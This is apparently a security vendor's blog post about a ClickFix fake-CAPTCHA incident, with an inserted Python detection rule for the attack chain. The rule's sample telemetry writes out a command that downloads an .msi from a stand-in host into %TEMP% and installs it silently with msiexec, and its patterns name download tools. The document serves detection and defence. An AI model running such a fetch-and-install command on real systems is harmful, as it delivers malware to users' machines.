
When a Copy-Paste Action Becomes a Security Incident

Prepared by: Philip O'Dwyer | Last update: 13 April 2026 

This article explores a ClickFix-style social engineering technique where users unknowingly execute malicious commands, bypassing traditional security controls. Learn how Triskele’s SOC analysts identified suspicious behaviour using endpoint telemetry, investigated the attack chain, and ensured it was contained before impact. The case highlights the growing risk of user-driven attacks, the limitations of signature-based detection, and the importance of behavioural monitoring, rapid response, and human-led analysis in modern cybersecurity operations. 

 

A Routine Action, An Unexpected Threat

During routine business activity, a standard end user within a monitored environment copied and executed a command from a website, following what appeared to be a legitimate CAPTCHA verification step. The action took place on an endpoint monitored by Triskele Labs’ Security Operations Centre, and at first glance, nothing about the interaction seemed out of the ordinary. 

However, this seemingly harmless behaviour quickly triggered a high-severity alert. What followed was a rapid investigation by Triskele’s SOC analysts, who identified the activity as part of a malware delivery attempt designed to blend in with normal user behaviour. 

The incident reflects a broader shift in cyber threats. Rather than exploiting technical vulnerabilities, attackers are increasingly relying on deception and familiarity, using trusted interactions to manipulate users into initiating the attack themselves. 

 

The Setup: When Familiar Interactions Are Weaponised 

The activity aligned with a known social engineering technique often referred to as ClickFix or FakeCaptcha. These attacks rely on something users encounter every day — CAPTCHA prompts. 

Instead of simply confirming that the visitor is human, the page tells the user to complete an additional step, typically framed as fixing an error. That step is to copy a command and run it. 

Because the interaction feels familiar and low-risk, users often comply without hesitation. 

A typical sequence includes: 

  • A CAPTCHA-style prompt appears on a website

  • The user clicks to proceed

  • An error message appears with instructions

  • The user is told to paste a command (often already placed on the clipboard by the page's script) into the Windows Run dialog or a PowerShell window and press Enter

  • The command silently executes malicious activity

On the surface, this appears routine, but in reality, it is a direct execution pathway for an attacker. 

 

What Happened in This Case 

Triskele’s SOC received a high-severity alert triggered by suspicious behavioural activity on an endpoint. 

Using endpoint telemetry, analysts identified that a command had been executed shortly after a user interaction with a web page. While the action itself — copying and running a command — is not inherently malicious, the sequence and context raised immediate concern. 

This is where behavioural detection becomes critical. Rather than relying on known malware signatures, the SOC focused on how the activity unfolded.


Breaking Down the Execution Chain 

Further investigation revealed a clear pattern: 

  • A command shell initiated execution 

  • A legitimate tool was used to download a file from an external source 

  • The file was saved to a temporary directory 

  • A system installer utility executed the file in silent mode 

From the user’s perspective, nothing appeared to happen. There were no prompts, no warnings, and no visible installation process. 

From an analyst’s perspective, the behaviour matched early-stage malware delivery techniques. 

This is a classic example of “living-off-the-land” — where attackers use trusted, built-in system tools to carry out malicious actions. By doing so, they reduce the likelihood of detection and blend into normal system activity. 

Why This Was Concerning

The file being delivered appeared to be associated with Node.js, a legitimate and widely used JavaScript runtime. This added a layer of credibility to the activity: a signed, well-known package landing on a workstation looks like ordinary software. 

Had execution completed successfully, it could have created a working directory and used the Node.js runtime to run attacker-supplied scripts in the background, with no new binary that a signature would need to match. 

Because the tools and processes involved were legitimate, this activity could easily have gone unnoticed without behavioural analysis. 
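The chain described above can be written down as a behavioural rule over process-creation telemetry, which is the kind of check the article says the SOC relied on instead of signatures. The Python below is an added example, not Triskele Labs' detection content and not anything taken from the incident: the article does not name the download tool, the installer, the file or the paths, so curl.exe, msiexec.exe, the %TEMP% location, the host 203.0.113.10 and every sample event are assumptions constructed for illustration. Only the shape of the chain (interactive shell, built-in download tool, temp directory, silent system installer) comes from the text. The sample also includes benign silent installs that must not fire, which is the "does this behaviour make sense" question in executable form.

```python
"""
Behavioural detection of a ClickFix-style execution chain over process-creation
telemetry (e.g. Sysmon event ID 1 or an EDR process stream).

Added example; not Triskele Labs' detection content. curl.exe, msiexec.exe, the
temp paths, the host 203.0.113.10 and all sample events are ASSUMED for
illustration; the article names none of them.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable base name, lowercase
    cmdline: str
    user: str


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
INTERACTIVE_LAUNCHERS = {"explorer.exe"}        # Run dialog / desktop launches
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe", "pwsh.exe"}

URL_RE = re.compile(r"https?://\S+", re.I)
TEMP_PATH_RE = re.compile(r"%temp%|\\appdata\\local\\temp\\|\\windows\\temp\\", re.I)
SILENT_RE = re.compile(r"(?:^|\s)/(?:qn|quiet)\b", re.I)
MSI_ARG_RE = re.compile(r"/i\s+\"?([^\"\s]+\.msi)\"?", re.I)


def ancestors(ev: ProcEvent, by_pid: dict[int, ProcEvent]) -> list[ProcEvent]:
    """Parent chain of ev, nearest first; stops at a missing or repeated pid."""
    chain, seen, cur = [], set(), by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def detect_clickfix_chain(events: list[ProcEvent]) -> list[dict]:
    """One finding per silent msiexec run that completes the chain.

    No single step is malicious on its own (every tool is built in and signed),
    so the rule needs all of them linked by lineage: msiexec.exe run silently,
    on an .msi in a temp directory, under a shell launched from the interactive
    session, plus a built-in download tool under that shell fetching a URL into
    a temp dir. A missing download only lowers confidence, since the sensor
    may not have recorded that process.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if ev.image != "msiexec.exe" or not SILENT_RE.search(ev.cmdline):
            continue
        m = MSI_ARG_RE.search(ev.cmdline)
        if not m or not TEMP_PATH_RE.search(m.group(1)):
            continue                            # package not in a temp dir
        shell = next((a for a in ancestors(ev, by_pid)
                      if a.image in SHELLS
                      and by_pid.get(a.ppid, a).image in INTERACTIVE_LAUNCHERS), None)
        if shell is None:
            continue                            # e.g. deployment agent running as SYSTEM
        downloads = [d for d in events
                     if d.image in DOWNLOADERS
                     and (d == shell or shell in ancestors(d, by_pid))
                     and URL_RE.search(d.cmdline) and TEMP_PATH_RE.search(d.cmdline)]
        findings.append({
            "user": ev.user,
            "shell_pid": shell.pid,
            "shell_cmdline": shell.cmdline,
            "download_cmdline": downloads[0].cmdline if downloads else None,
            "installer_cmdline": ev.cmdline,
            "msi_path": m.group(1),
            "confidence": "high" if downloads else "medium",
        })
    return findings


# Constructed sample telemetry for one host (NOT real logs). Events 1-4: the
# chain pasted into the Run dialog. Events 5-7: benign installs that must not
# fire (managed deployment as SYSTEM; user double-clicking a downloaded package).
SAMPLE_EVENTS = [
    ProcEvent(1040, 4, "explorer.exe", "C:\\Windows\\explorer.exe", "corp\\j.smith"),
    ProcEvent(5120, 1040, "cmd.exe",
              'cmd.exe /c curl -s -o "%TEMP%\\node-setup.msi" https://203.0.113.10/ver.msi '
              '&& msiexec /i "%TEMP%\\node-setup.msi" /qn', "corp\\j.smith"),
    ProcEvent(5128, 5120, "curl.exe",
              'curl -s -o "C:\\Users\\j.smith\\AppData\\Local\\Temp\\node-setup.msi" '
              'https://203.0.113.10/ver.msi', "corp\\j.smith"),
    ProcEvent(5140, 5120, "msiexec.exe",
              'msiexec /i "C:\\Users\\j.smith\\AppData\\Local\\Temp\\node-setup.msi" /qn',
              "corp\\j.smith"),
    ProcEvent(800, 4, "ccmexec.exe", "C:\\Windows\\CCM\\CcmExec.exe", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(2200, 800, "msiexec.exe",
              'msiexec /i "C:\\Windows\\ccmcache\\a1\\7zip.msi" /qn', "NT AUTHORITY\\SYSTEM"),
    ProcEvent(6010, 1040, "msiexec.exe",
              'msiexec /i "C:\\Users\\j.smith\\Downloads\\tool.msi"', "corp\\j.smith"),
]

if __name__ == "__main__":
    for f in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"[{f['confidence']}] {f['user']} shell {f['shell_pid']}: {f['installer_cmdline']}")
```

The rule keys on lineage rather than on any one indicator: the same `msiexec /qn` issued by a deployment agent as SYSTEM, or a package the user double-clicked from Downloads, never reaches the alert, which is the "legitimate business justification" check from the response section expressed as code. The command the user pasted survives verbatim in the shell's own process-creation event, and that shell's parent being explorer.exe is what marks it as user-initiated from the Run dialog; without parent-child context the individual events look like routine software installation.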

How Triskele’s SOC Responded 

Triskele’s SOC analysts validated the alert, investigated the execution chain, and confirmed the activity as malicious based on behavioural indicators. 

Crucially, this was not a case of relying on a single alert or automated decision. The SOC:

  • Analysed command-line behaviour in context 

  • Identified anomalies in execution flow 

  • Assessed intent, not just activity 

  • Confirmed the absence of legitimate business justification 

Using endpoint telemetry as a signal source, analysts ensured the activity was contained before it could progress. 

The installer did not complete, no persistence mechanisms were established, and there was no evidence of further compromise. 

This outcome was not just detection — it was informed, human-led response. 

The Bigger Picture: Attacks That Look Legitimate

This incident highlights a broader challenge in modern cybersecurity. 

Attackers are no longer relying solely on malware that looks malicious. Instead, they are using legitimate tools, familiar workflows, and trusted applications to carry out attacks. 

The question is no longer just “is this file malicious?” 

It is “does this behaviour make sense?” 

That distinction is where traditional controls often fall short. 

 

What organisations should take away

This type of attack reinforces several key points: 

  • User behaviour is now a primary attack vector: even simple actions, like copying and running a command, can introduce significant risk 

  • Familiar interfaces can be deceptive: CAPTCHAs and error prompts are being actively weaponised 

  • Signature-based detection is not enough: threats that use legitimate, built-in tools require behavioural analysis 

  • Visibility into command-line activity is critical: knowing how a process was launched, by what parent, and with which arguments provides the context that turns individually benign events into a recognisable chain

Making These Attacks Non-Fatal 

Preventing every user action is not realistic. Users will continue to interact with content, follow instructions, and make decisions in real time. 

The focus must shift from prevention alone to resilience. 

Triskele Labs’ SOC is designed to identify behavioural patterns, investigate anomalies, and respond before activity becomes a compromise. 

By combining endpoint telemetry, detection engineering, and analyst-driven investigation, potentially harmful actions can be contained before they escalate. 

A user may still paste a command; the difference is whether that action leads to compromise or is stopped in its tracks. 


SOC Technical Analysis: https://www.triskelelabs.com/blog/soc-technical-analysis-copy-paste-action-becomes-a-security-incident